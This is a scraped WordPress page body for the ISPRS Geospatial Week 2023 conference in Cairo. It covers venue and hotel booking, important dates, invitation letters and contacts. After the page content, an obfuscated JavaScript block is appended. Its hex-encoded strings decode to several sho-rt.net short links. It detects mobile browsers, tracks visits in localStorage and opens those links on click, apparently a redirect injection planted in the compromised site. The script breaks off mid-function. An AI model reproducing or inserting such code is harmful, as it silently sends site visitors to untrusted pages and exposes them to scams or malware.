style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 